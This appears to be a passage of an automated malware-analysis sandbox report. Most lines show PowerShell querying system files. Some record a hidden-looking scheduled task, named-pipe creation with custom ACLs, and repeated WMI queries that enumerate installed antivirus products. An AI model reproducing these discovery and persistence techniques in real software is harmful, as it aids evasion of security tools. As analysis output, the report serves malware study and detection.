Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\System32\Tasks\$rbx-FHOIapsb VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\System32\Tasks\$rbx-FHOIapsb VolumeInformation
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 38_2_0000000140002300
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC408090 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 17_2_00000253FC408090
Source: Amcache.hve.11.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.11.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.11.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.11.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: dllhost.exe, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.49.dr, Amcache.hve.11.dr Binary or memory string: MsMpEng.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct